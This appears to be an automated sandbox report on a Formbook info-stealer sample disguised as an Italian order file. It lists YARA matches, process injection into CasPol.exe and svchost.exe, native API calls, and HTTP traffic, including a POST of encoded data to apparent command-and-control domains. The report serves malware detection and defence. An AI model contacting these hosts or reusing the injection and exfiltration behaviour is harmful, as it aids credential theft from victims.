3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 
2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 10 Feb 2023 11:45:59 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 
2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Feb 2023 11:46:12 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Feb 2023 11:46:24 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
          Source: 50-ET7Wv7.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: svchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: svchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: svchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: svchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: svchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: svchost.exe, 0000000B.00000002.525015381.0000000004272000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6e
          Source: unknownHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.specigain.onlineConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.specigain.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.specigain.online/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 31 75 61 3d 67 33 42 74 5a 34 56 76 30 4a 31 36 31 79 6e 48 73 72 56 6f 32 46 4e 78 4a 55 30 4a 7e 67 30 4c 4e 6f 67 6a 4b 4b 79 7a 47 33 6f 71 35 42 53 47 34 39 75 69 4c 6e 7e 50 45 63 79 68 7a 38 63 4d 52 38 6c 6f 44 41 45 6a 77 71 30 4e 71 36 77 72 4f 45 65 44 73 62 49 4f 4e 4a 78 6c 77 30 56 4b 4f 71 51 5f 4e 41 33 30 50 54 78 73 54 54 46 4e 79 53 48 7a 51 51 64 5f 68 4a 56 5f 65 63 50 31 47 56 65 63 77 35 47 6d 61 70 37 5f 65 56 63 74 49 58 34 4f 70 30 6f 49 71 6a 39 61 64 62 71 6b 56 46 59 52 6e 38 51 57 49 4d 69 6c 69 71 47 71 58 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: u1ua=g3BtZ4Vv0J161ynHsrVo2FNxJU0J~g0LNogjKKyzG3oq5BSG49uiLn~PEcyhz8cMR8loDAEjwq0Nq6wrOEeDsbIONJxlw0VKOqQ_NA30PTxsTTFNySHzQQd_hJV_ecP1GVecw5Gmap7_eVctIX4Op0oIqj9adbqkVFYRn8QWIMiliqGqXg).
          Source: unknown DNS traffic detected: queries for: www.verde-amar.info
          Source: C:\Windows\explorer.exe Code function: 2_2_085DC4F2 getaddrinfo,SleepEx,setsockopt,recv,recv
          Source: C:\Windows\explorer.exe Code function: 2_2_085D5E22 OpenClipboard

          E-Banking Fraud

          Source: Yara match File source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Each of the following seven sources matched both Yara rules listed after them:
          Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown; reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 0162B150 appears 133 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0322B150 appears 133 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0041E5B3 NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0041E663 NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0041E6E3 NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0041E793 NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0041E65D NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0041E6DE NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0041E78D NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_01669910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_016699A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_01669860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_01669840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_016698F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_01669A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_01669A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_01669A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_01669540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_016695D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_01669710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_01669FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_016697A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_01669780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01669660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016696E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_016696E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669950 NtQueueApcThread,1_2_01669950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016699D0 NtCreateProcessEx,1_2_016699D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0166B040 NtSuspendThread,1_2_0166B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669820 NtEnumerateKey,1_2_01669820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016698A0 NtWriteVirtualMemory,1_2_016698A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669B00 NtSetValueKey,1_2_01669B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0166A3B0 NtGetContextThread,1_2_0166A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669A10 NtQuerySection,1_2_01669A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669A80 NtOpenDirectoryObject,1_2_01669A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669560 NtWriteFile,1_2_01669560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669520 NtWaitForSingleObject,1_2_01669520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0166AD30 NtSetContextThread,1_2_0166AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016695F0 NtQueryInformationFile,1_2_016695F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669760 NtOpenProcess,1_2_01669760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669770 NtSetInformationFile,1_2_01669770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0166A770 NtOpenThread,1_2_0166A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669730 NtQueryVirtualMemory,1_2_01669730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0166A710 NtOpenProcessToken,1_2_0166A710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669670 NtQueryInformationProcess,1_2_01669670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669650 NtQueryValueKey,1_2_01669650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669610 NtEnumerateValueKey,1_2_01669610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016696D0 NtCreateKey,1_2_016696D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269A50 NtCreateFile,LdrInitializeThunk,11_2_03269A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_03269910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032699A0 NtCreateSection,LdrInitializeThunk,11_2_032699A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269860 NtQuerySystemInformation,LdrInitializeThunk,11_2_03269860
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269840 NtDelayExecution,LdrInitializeThunk,11_2_03269840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269710 NtQueryInformationToken,LdrInitializeThunk,11_2_03269710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269780 NtMapViewOfSection,LdrInitializeThunk,11_2_03269780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269FE0 NtCreateMutant,LdrInitializeThunk,11_2_03269FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269610 NtEnumerateValueKey,LdrInitializeThunk,11_2_03269610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03269660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269650 NtQueryValueKey,LdrInitializeThunk,11_2_03269650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032696E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_032696E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032696D0 NtCreateKey,LdrInitializeThunk,11_2_032696D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269560 NtWriteFile,LdrInitializeThunk,11_2_03269560
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269540 NtReadFile,LdrInitializeThunk,11_2_03269540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032695D0 NtClose,LdrInitializeThunk,11_2_032695D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269B00 NtSetValueKey,11_2_03269B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0326A3B0 NtGetContextThread,11_2_0326A3B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269A20 NtResumeThread,11_2_03269A20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269A00 NtProtectVirtualMemory,11_2_03269A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269A10 NtQuerySection,11_2_03269A10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269A80 NtOpenDirectoryObject,11_2_03269A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269950 NtQueueApcThread,11_2_03269950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032699D0 NtCreateProcessEx,11_2_032699D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269820 NtEnumerateKey,11_2_03269820
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0326B040 NtSuspendThread,11_2_0326B040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032698A0 NtWriteVirtualMemory,11_2_032698A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032698F0 NtReadVirtualMemory,11_2_032698F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269730 NtQueryVirtualMemory,11_2_03269730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0326A710 NtOpenProcessToken,11_2_0326A710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269760 NtOpenProcess,11_2_03269760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0326A770 NtOpenThread,11_2_0326A770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269770 NtSetInformationFile,11_2_03269770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032697A0 NtUnmapViewOfSection,11_2_032697A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269670 NtQueryInformationProcess,11_2_03269670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269520 NtWaitForSingleObject,11_2_03269520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0326AD30 NtSetContextThread,11_2_0326AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032695F0 NtQueryInformationFile,11_2_032695F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3CA10 NtAllocateVirtualMemory,11_2_02C3CA10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3C8E0 NtReadFile,11_2_02C3C8E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3C830 NtCreateFile,11_2_02C3C830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3C960 NtClose,11_2_02C3C960
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3C930 NtDeleteFile,11_2_02C3C930
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3CA0A NtAllocateVirtualMemory,11_2_02C3CA0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3C8DA NtReadFile,11_2_02C3C8DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3C95B NtClose,11_2_02C3C95B
          Source: Requisito ordine n. 230210.exeStatic PE information: No import functions for PE file found
          Source: Requisito ordine n. 230210.exe, 00000000.00000002.269239025.00000222752EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exe, 00000000.00000000.255259098.0000022275106000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNNbBbB.exe. vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exe, 00000000.00000002.269739966.0000022275420000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exe, 00000000.00000002.269739966.0000022275420000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exe, 00000000.00000002.265960363.000002220001D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exe, 00000000.00000002.265960363.000002220001D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exe, 00000000.00000002.269766071.0000022275440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exeBinary or memory string: OriginalFilenameNNbBbB.exe. vs Requisito ordine n. 230210.exe
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe Section loaded: mscorjit.dll
          Source: Requisito ordine n. 230210.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Requisito ordine n. 230210.exeReversingLabs: Detection: 17%
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Requisito ordine n. 230210.exe C:\Users\user\Desktop\Requisito ordine n. 230210.exe
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Requisito ordine n. 230210.exe.log
          Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Users\user\AppData\Local\Temp\50-ET7Wv7
